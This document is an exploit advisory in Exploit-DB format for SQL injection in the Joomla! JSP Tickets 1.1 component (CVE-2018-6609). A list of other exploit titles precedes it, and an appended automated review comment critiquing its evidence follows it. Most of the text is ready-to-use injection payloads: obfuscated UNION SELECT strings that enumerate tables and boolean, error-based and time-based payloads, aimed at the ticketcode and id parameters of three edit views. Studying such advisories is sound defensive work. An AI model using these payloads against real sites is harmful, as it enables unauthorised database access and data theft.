
19 changes to exploits/shellcodes WordPress Core - 'load-scripts.php' Denial of Service Sync Breeze Enterprise 10.0.28 - Remote Buffer Overflow (PoC) Claymore Dual GPU Miner 10.5 - Format String Apport/ABRT - 'chroot' Local Privilege Escalation (Metasploit) MalwareFox AntiMalware 2.74.0.150 - Privilege Escalation BOCHS 2.6-5 - Buffer Overflow Windows - 'EternalRomance'/'EternalSynergy'/'EternalChampion' SMB Remote Code Execution (Metasploit) (MS17-010) Wonder CMS 2.3.1 - Unrestricted File Upload Wonder CMS 2.3.1 - 'Host' Header Injection Matrimonial Website Script 2.1.6 - 'uid' SQL Injection NixCMS 1.0 - 'category_id' SQL Injection Online Voting System - Authentication Bypass Joomla! Component Zh BaiduMap 3.0.0.1 - SQL Injection Joomla! Component Zh YandexMap 6.2.1.0 - 'id' SQL Injection Joomla! Component Zh GoogleMap 8.4.0.0 - SQL Injection Joomla! Component jLike 1.0 - Information Leak Joomla! Component JSP Tickets 1.1 - SQL Injection Student Profile Management System Script 2.0.6 - Authentication Bypass Netis WF2419 Router - Cross-Site Scripting Linux/x64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Password (1234567) Shellcode (136 bytes)
# # # # #
# Exploit Title: Joomla! Component JSP Tickets 1.1 - SQL Injection
# Dork: N/A
# Date: 04.02.2018
# Vendor Homepage: http://joomlaserviceprovider.com/
# Software Link: https://extensions.joomla.org/extensions/extension/clients-a-communities/help-desk/jsp-tickets/
# Version: 1.1
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2018-6609
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# Want To Donate ?
# BTC : 1NGEp2eNWRCE6gp2i31UPN6G6KBzMDdCyZ
# ETH : 0xd606c6b86a1b88c7fcc1f58f7659cfd968449cf2
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# 1)
# http://localhost/[PATH]/index.php?option=com_jsptickets&controller=ticketlist&task=edit&ticketcode=[SQL]
#
# -66' /*!07777UNION*/ /*!07777SELECT*/ nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,/*!07777CONCAT*/((/*!07777SELECT*/+GROUP_CONCAT(table_name+SEPARATOR+0x3c62723e)+/*!07777FROM*/+INFORMATION_SCHEMA.TABLES+/*!07777WHERE*/+TABLE_SCHEMA=DATABASE())),nUlL,nUlL,nUlL,nUlL--+VerAyari
#
# Parameter: ticketcode (GET)
# Type: boolean-based blind
# Title: AND boolean-based blind - WHERE or HAVING clause
# Payload: option=com_jsptickets&controller=ticketlist&task=edit&ticketcode=5a71d319e86c1' AND 5298=5298 AND 'okLe'='okLe
#
# Type: error-based
# Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
# Payload: option=com_jsptickets&controller=ticketlist&task=edit&ticketcode=5a71d319e86c1' AND (SELECT 8072 FROM(SELECT COUNT(*),CONCAT(0x717a6a7871,(SELECT (ELT(8072=8072,1))),0x717a706a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'FwvD'='FwvD
#
# Type: AND/OR time-based blind
# Title: MySQL >= 5.0.12 AND time-based blind
# Payload: option=com_jsptickets&controller=ticketlist&task=edit&ticketcode=5a71d319e86c1' AND SLEEP(5) AND 'Ozir'='Ozir
#
# Type: UNION query
# Title: Generic UNION query (NULL) - 29 columns
# Payload: option=com_jsptickets&controller=ticketlist&task=edit&ticketcode=-4507' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x717a6a7871,0x72476c507a64564861484f575645536355695958564f4c4e6858625061774a6b59796b6571746249,0x717a706a71),NULL,NULL,NULL,NULL-- fcOG
# 2)
# http://localhost/[PATH]/index.php?option=com_jsptickets&controller=statuslist&task=edit&id=[SQL]
#
# 66 AND (SELECT 66 FROM(SELECT COUNT(*),CONCAT(CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),(SELECT (ELT(66=66,1))),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
#
#
# Parameter: id (GET)
# Type: boolean-based blind
# Title: AND boolean-based blind - WHERE or HAVING clause
# Payload: option=com_jsptickets&controller=statuslist&task=edit&id=4 AND 6325=6325
#
# Type: error-based
# Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
# Payload: option=com_jsptickets&controller=statuslist&task=edit&id=4 AND (SELECT 4097 FROM(SELECT COUNT(*),CONCAT(0x71716a7a71,(SELECT (ELT(4097=4097,1))),0x717a707a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
#
# Type: AND/OR time-based blind
# Title: MySQL >= 5.0.12 AND time-based blind
# Payload: option=com_jsptickets&controller=statuslist&task=edit&id=4 AND SLEEP(5)
#
# 3)
# http://localhost/[PATH]/index.php?option=com_jsptickets&controller=prioritylist&task=edit&id=[SQL]
#
# 66 AND (SELECT 66 FROM(SELECT COUNT(*),CONCAT(CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),(SELECT (ELT(66=66,1))),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
#
# Parameter: id (GET)
# Type: boolean-based blind
# Title: AND boolean-based blind - WHERE or HAVING clause
# Payload: option=com_jsptickets&controller=prioritylist&task=edit&id=1 AND 9454=9454
#
# Type: error-based
# Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
# Payload: option=com_jsptickets&controller=prioritylist&task=edit&id=1 AND (SELECT 1045 FROM(SELECT COUNT(*),CONCAT(0x7170716a71,(SELECT (ELT(1045=1045,1))),0x716b6a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
#
# Type: AND/OR time-based blind
# Title: MySQL >= 5.0.12 OR time-based blind
# Payload: option=com_jsptickets&controller=prioritylist&task=edit&id=1 OR SLEEP(5)
#
# 4)
#
# <form method="post" action="http://localhost/[PATH]/index.php?option=com_jsptickets&controller=ticketlist&task=display">
# <input type="text" name="jform[guestemail]"...
# <input type="text" name="jform[ticketid]"...
# <input type="submit" name="searchsubmit"...
# </form>
#
# # # # # |
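Review bot: Section 4) lists the ticketlist search form with its `jform[guestemail]`, `jform[ticketid]` and `searchsubmit` fields but gives no payload, response or other evidence, so it is unclear whether that entry point was confirmed or only suspected; it should be marked as untested or backed by the observation that supports it. The description line "The vulnerability allows an attacker to inject sql commands...." could instead state what the payloads in sections 1) to 3) show: the `ticketcode` and `id` GET parameters of the ticketlist, statuslist and prioritylist `task=edit` views apparently reach the database query without escaping. The header names CVE-2018-6609 but no fixed version or vendor response, which is what a site operator needs in order to decide between upgrading and disabling the component; if none is known, a line such as `# Fix: none known at time of writing` makes that explicit. The "Tested on" line describes the tester's platforms rather than the affected server stack, while the error- and time-based titles state MySQL version requirements, so the affected environment should be given alongside them.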